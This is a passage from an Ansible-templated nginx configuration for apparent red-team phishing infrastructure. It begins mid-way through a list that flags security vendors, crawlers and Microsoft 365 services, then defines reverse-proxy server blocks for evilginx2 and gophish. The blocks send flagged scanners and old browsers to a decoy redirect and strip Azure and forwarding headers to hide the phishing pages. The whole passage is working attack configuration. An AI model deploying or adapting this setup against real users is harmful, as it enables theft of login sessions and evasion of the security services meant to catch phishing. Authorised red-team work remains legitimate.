    "~*paypal*" 1;
    "~*torservers*" 1;
    "~*comodo*" 1;
    "~*crawl*" 1;
    "~*crawler*" 1;
    "~*proxy*" 1;
    "~*cloudflare*" 1;
    "~*yahoo*" 1;
    "~*trustwave*" 1;
    "~*centralnic*" 1;
    "~*badware*" 1;
    "~*phishing*" 1;
    "~*antivirus*" 1;
    "~*SiteAdvisor*" 1;
    "~*McAfee*" 1;
    "~*Bitdefender*" 1;
    "~*avirasoft*" 1;
    "~*googleusercontent*" 1;
    "~*outlook.office*" 1;
    "~*outlook.office365*" 1;
    "~*smtp.office365*" 1;
    "~*.outlook.office*" 1;
    "~*.outlook*" 1;
    "~*.protection.outlook*" 1;
    "~*.mail.protection.outlook*" 1;
    "~*.lync*" 1;
    "~*.teams.microsoft*" 1;
    "~*teams.microsoft*" 1;
    "~*.broadcast.skype*" 1;
    "~*broadcast.skype*" 1;
    "~*.sfbassets*" 1;
    "~*.keydelivery.mediaservices*" 1;
    "~*.streaming.mediaservices*" 1;
    "~*mlccdn.blob.core*" 1;
    "~*aka.ms*" 1;
    "~*.users.storage*" 1;
    "~*.adl*" 1;
    "~*.skypeforbusiness*" 1;
    "~*.msedge*" 1;
    "~*.mstea.ms*" 1;
    "~*.secure.skypeassets*" 1;
    "~*mlccdnprod.azureedge*" 1;
    "~*.sharepoint*" 1;
    "~*ssw*" 1;
    "~*storage*" 1;
    "~*.search.production.apac.trafficmanager*" 1;
    "~*.search.production.emea.trafficmanager*" 1;
    "~*.search.production.us.trafficmanager*" 1;
    "~*.wns*" 1;
    "~*admin.onedrive*" 1;
    "~*officeclient.microsoft*" 1;
    "~*oneclient.sfx.ms*" 1;
    "~*.sharepointonline*" 1;
    "~*spoprod-a.akamaihd*" 1;
    "~*.svc.ms*" 1;
    "~*.microsoftstream*" 1;
    "~*nps.onyx.azure*" 1;
    "~*.azureedge*" 1;
    "~*.media.azure*" 1;
    "~*.officeapps*" 1;
    "~*.online.office*" 1;
    "~*office*" 1;
    "~*.office*" 1;
    "~*.onenote*" 1;
    "~*.microsoft*" 1;
    "~*cdn.onenote*" 1;
    "~*ajax.aspnetcdn*" 1;
    "~*apis*" 1;
    "~*officeapps*" 1;
    "~*www.onedrive*" 1;
    "~*.auth.microsoft*" 1;
    "~*.msftidentity*" 1;
    "~*.msidentity*" 1;
    "~*account.activedirectory.windowsazure*" 1;
    "~*accounts.accesscontrol*" 1;
    "~*adminwebservice.microsoftonline*" 1;
    "~*api.passwordreset.microsoftonline*" 1;
    "~*autologon.microsoftazuread-sso*" 1;
    "~*becws.microsoftonline*" 1;
    "~*ccs.login.microsoftonline*" 1;
    "~*clientconfig.microsoftonline-p*" 1;
    "~*companymanager.microsoftonline*" 1;
    "~*device.login.microsoftonline*" 1;
    "~*graph.microsoft*" 1;
    "~*graph.windows*" 1;
    "~*login.microsoft*" 1;
    "~*login.microsoftonline*" 1;
    "~*login.microsoftonline-p*" 1;
    "~*login.windows*" 1;
    "~*logincert.microsoftonline*" 1;
    "~*loginex.microsoftonline*" 1;
    "~*login-us.microsoftonline*" 1;
    "~*nexus.microsoftonline-p*" 1;
    "~*passwordreset.microsoftonline*" 1;
    "~*provisioningapi.microsoftonline*" 1;
    "~*.hip*" 1;
    "~*.microsoftonline*" 1;
    "~*.microsoftonline-p*" 1;
    "~*.msauth*" 1;
    "~*.msauthimages*" 1;
    "~*.msecnd*" 1;
    "~*.msftauth*" 1;
    "~*.msftauthimages*" 1;
    "~*.phonefactor*" 1;
    "~*enterpriseregistration*" 1;
    "~*management.azure*" 1;
    "~*policykeyservice.dc.ad*" 1;
    "~*.compliance.microsoft*" 1;
    "~*.protection.office*" 1;
    "~*.security.microsoft*" 1;
    "~*compliance.microsoft*" 1;
    "~*defender.microsoft*" 1;
    "~*protection.office*" 1;
    "~*security.microsoft*" 1;
    "~*account.office*" 1;
    "~*.portal.cloudappsecurity*" 1;
    "~*.blob.core*" 1;
    "~*firstpartyapps.oaspapps*" 1;
    "~*prod.firstpartyapps.oaspapps.com.akadns*" 1;
    "~*telemetryservice.firstpartyapps.oaspapps*" 1;
    "~*wus-firstpartyapps.oaspapps*" 1;
    "~*.aria.microsoft*" 1;
    "~*.events.data.microsoft*" 1;
    "~*.o365weve*" 1;
    "~*amp.azure*" 1;
    "~*appsforoffice.microsoft*" 1;
    "~*assets.onestore.ms*" 1;
    "~*auth.gfx.ms*" 1;
    "~*c1.microsoft*" 1;
    "~*dgps.support.microsoft*" 1;
    "~*docs.microsoft*" 1;
    "~*msdn.microsoft*" 1;
    "~*platform.linkedin*" 1;
    "~*prod.msocdn*" 1;
    "~*shellprod.msocdn*" 1;
    "~*support.microsoft*" 1;
    "~*technet.microsoft*" 1;
    "~*.office365*" 1;
    "~*.cloudapp*" 1;
    "~*.aadrm*" 1;
    "~*.azurerms*" 1;
    "~*.informationprotection.azure*" 1;
    "~*ecn.dev.virtualearth*" 1;
    "~*informationprotection.hosting.portal.azure*" 1;
    "~*dc.services.visualstudio*" 1;
    "~*mem.gfx.ms*" 1;
    "~*staffhub.ms*" 1;
    "~*.msocdn*" 1;
    "~*.onmicrosoft*" 1;
    "~*o15.officeredir.microsoft*" 1;
    "~*officepreviewredir.microsoft*" 1;
    "~*officeredir.microsoft*" 1;
    "~*r.office.microsoft*" 1;
    "~*activation.sls.microsoft*" 1;
    "~*crl.microsoft*" 1;
    "~*office15client.microsoft*" 1;
    "~*go.microsoft*" 1;
    "~*cdn.odc.officeapps*" 1;
    "~*officecdn.microsoft*" 1;
    "~*officecdn.microsoft.com.edgesuite*" 1;
    "~*.virtualearth*" 1;
    "~*c.bing*" 1;
    "~*excelbingmap.firstpartyapps.oaspapps*" 1;
    "~*ocos-office365-s2s.msedge*" 1;
    "~*peoplegraph.firstpartyapps.oaspapps*" 1;
    "~*tse1.mm.bing*" 1;
    "~*wikipedia.firstpartyapps.oaspapps*" 1;
    "~*www.bing*" 1;
    "~*.acompli*" 1;
    "~*.outlookmobile*" 1;
    "~*login.windows-ppe*" 1;
    "~*account*" 1;
    "~*login*" 1;
    "~*www.acompli*" 1;
    "~*.appex.bing*" 1;
    "~*.appex-rf.msn*" 1;
    "~*c.bing*" 1;
    "~*d.docs*" 1;
    "~*directory.services*" 1;
    "~*docs*" 1;
    "~*partnerservices.getmicrosoftkey*" 1;
    "~*signup*" 1;
    "~*.yammer*" 1;
    "~*.yammerusercontent*" 1;
    "~*.assets-yammer*" 1;
    "~*www.outlook*" 1;
    "~*eus-www.sway-cdn*" 1;
    "~*eus-www.sway-extensions*" 1;
    "~*wus-www.sway-cdn*" 1;
    "~*wus-www.sway-extensions*" 1;
    "~*sway*" 1;
    "~*www.sway*" 1;
    "~*.entrust*" 1;
    "~*.geotrust*" 1;
    "~*.omniroot*" 1;
    "~*.public-trust*" 1;
    "~*.symcb*" 1;
    "~*.symcd*" 1;
    "~*.verisign*" 1;
    "~*.verisign*" 1;
    "~*apps.identrust*" 1;
    "~*cacerts.digicert*" 1;
    "~*cert.int-x3.letsencrypt*" 1;
    "~*crl.globalsign*" 1;
    "~*crl.globalsign*" 1;
    "~*crl.identrust*" 1;
    "~*crl3.digicert*" 1;
    "~*crl4.digicert*" 1;
    "~*isrg.trustid.ocsp.identrust*" 1;
    "~*mscrl.microsoft*" 1;
    "~*ocsp.digicert*" 1;
    "~*ocsp.globalsign*" 1;
    "~*ocsp.msocsp*" 1;
    "~*ocsp2.globalsign*" 1;
    "~*ocspx.digicert*" 1;
    "~*secure.globalsign*" 1;
    "~*www.digicert*" 1;
    "~*www.microsoft*" 1;
    "~*officespeech.platform.bing*" 1;
    "~*.skype*" 1;
    "~*.manage.microsoft*" 1;
    "~*.office*" 1;
    "~*cdnprod.myanalytics.microsoft*" 1;
    "~*myanalytics.microsoft*" 1;
    "~*myanalytics-gcc.microsoft*" 1;
    "~*.microsoftusercontent*" 1;
    "~*.azure-apim*" 1;
    "~*.flow.microsoft*" 1;
    "~*.powerapps*" 1;
    "~*autodiscover*.onmicrosoft*" 1;
    "~*.activity*" 1;
    "~*activity.windows*" 1;
    "~*ocsp.int-x3.letsencrypt*" 1;
    "~*.cortana.ai*" 1;
    "~*admin.microsoft*" 1;
    "~*cdn.uci.officeapps*" 1;
    "~*compass-ssl.microsoft*" 1;
    "~*avanan*" 1;
    "~*proofpoint*" 1;
    "~*paloalto*" 1;
    "~*splunk*" 1;
    "~*cisco*" 1;
    "~*DuoCircle*" 1;
    "~*barracuda*" 1;
    "~*fireeye*" 1;
    "~*fortinet*" 1;
    "~*globalrelay*" 1;
    "~*cast*" 1;
    "~*titan*" 1;
    "~*security*" 1;
    "~*sophos*" 1;
    "~*mime*" 1;
    "~*mimecast*" 1;
    "~*spam*" 1;
    "~*sonicwall*" 1;
    "~*mail*" 1;
    "~*mandiant*" 1;
    "~*NICEActimize*" 1;
    "~*arcticwolf*" 1;
    "~*broadcom*" 1;
    "~*symantec*" 1;
    "~*protect*" 1;
    "~*filter*" 1;
    "~*xeams*" 1;
    "~*zoho*" 1;
    "~*zscaler*" 1;
  }

  server {
    server_name {% raw %}{{ ansible_host }}{% endraw %};
    listen 443 ssl;
    ssl_certificate /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/privkey.pem;
    ssl_session_timeout 1440m;
    ssl_session_cache shared:le_nginx_SSL:1m;
    ssl_session_tickets off;
    ssl_protocols TLSv1.2;
    ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256';
    ssl_prefer_server_ciphers on;
    ssl_stapling on;
    ssl_stapling_verify on;

    location / {
      rewrite ^ https://{% raw %}{{ redirect_domain }}{% endraw %};
    }
  
  }
{% for vm in warhorse.vm %}
{% if vm.evilginx2 is defined and vm.evilginx2.enabled %}
  server {
    server_name {% for host in vm.evilginx2.nginx_hostnames %}{{ host }}.{{ vm.evilginx2.evilginx_domain }} {% endfor %};
    listen 443 ssl;
    ssl_certificate /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/privkey.pem;
    ssl_session_timeout 1440m;
    ssl_session_cache shared:le_nginx_SSL:1m;
    ssl_session_tickets off;
    ssl_protocols TLSv1.2;
    ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256';
    ssl_prefer_server_ciphers on;
    ssl_stapling on;
    ssl_stapling_verify on;

    proxy_busy_buffers_size   512k;
    proxy_buffers   4 512k;
    proxy_buffer_size   256k;
    fastcgi_buffers  16 16k;
    fastcgi_buffer_size  32k;

    if ($is_bot) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($block_ip) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($old_chrome) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($old_safari) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($request_method !~ ^(GET|POST)$ ) {
        return 403;
    }

    location / {
      resolver 127.0.0.11 valid=10s;
      proxy_ssl_server_name on;
      proxy_ssl_name $host;
      proxy_set_header Host $host;
      proxy_set_header X-Real-IP "";
      proxy_set_header X-Forwarded-For "";
      proxy_set_header X-Forwarded-Proto "";
      proxy_set_header X-Forwarded-Host "";
      proxy_set_header X-Azure-Socketip "";
      proxy_set_header X-Azure-Requestchain "";
      proxy_set_header X-Azure-Ref "";
      proxy_set_header X-Azure-Ipdetection "";
      proxy_set_header X-Azure-Fdid "";
      proxy_set_header X-Azure-Clientip "";
      proxy_set_header Via "";
      proxy_set_header X-Msedge-Ignoreratelimits "";
      proxy_ssl_protocols  TLSv1 TLSv1.1 TLSv1.2; 
      proxy_ssl_verify off;
      proxy_pass https://evilginx2:443;
    }
  }
{% endif %}
{% if vm.gophish is defined and vm.gophish.enabled %}
  server {
      server_name {{ vm.gophish.admin_hostname }}.{% raw %}{{ domain_name }}{% endraw %};
      listen 443 ssl;
      ssl_certificate /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/fullchain.pem;
      ssl_certificate_key /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/privkey.pem;
      ssl_session_timeout 1440m;
      ssl_session_cache shared:le_nginx_SSL:1m;
      ssl_session_tickets off;
      ssl_protocols TLSv1.2;
      ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256';
      ssl_prefer_server_ciphers on;
      ssl_stapling on;
      ssl_stapling_verify on;

      location / {
        proxy_ssl_server_name on;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $remote_addr;
        proxy_pass http://gophish:3333;
        allow {{ vm.gophish.white_list_ip }};
        deny all;
      }
    }
  server {
    server_name {{ vm.gophish.site_hostname }}.{% raw %}{{ domain_name }}{% endraw %};
    listen 443 ssl;
    ssl_certificate /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/{% raw %}{{ domain_name }}{% endraw %}/privkey.pem;
    ssl_session_timeout 1440m;
    ssl_session_cache shared:le_nginx_SSL:1m;
    ssl_session_tickets off;
    ssl_protocols TLSv1.2;
    ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256';
    ssl_prefer_server_ciphers on;
    ssl_stapling on;
    ssl_stapling_verify on;

    if ($arg_keyname = "") {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($is_bot) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($block_ip) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($old_chrome) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($old_safari) {
        return 302 https://{% raw %}{{ redirect_domain }}{% endraw %};
    }

    if ($request_method !~ ^(GET|POST)$ ) {
        return 403;
    }

    location / {
      proxy_ssl_server_name on;
      proxy_set_header Host $host;
      proxy_set_header X-Real-IP $remote_addr;
      proxy_set_header X-Forwarded-For $remote_addr;
      proxy_pass http://gophish:80;
    }
  }
{% endif %}
{% endfor %}
}
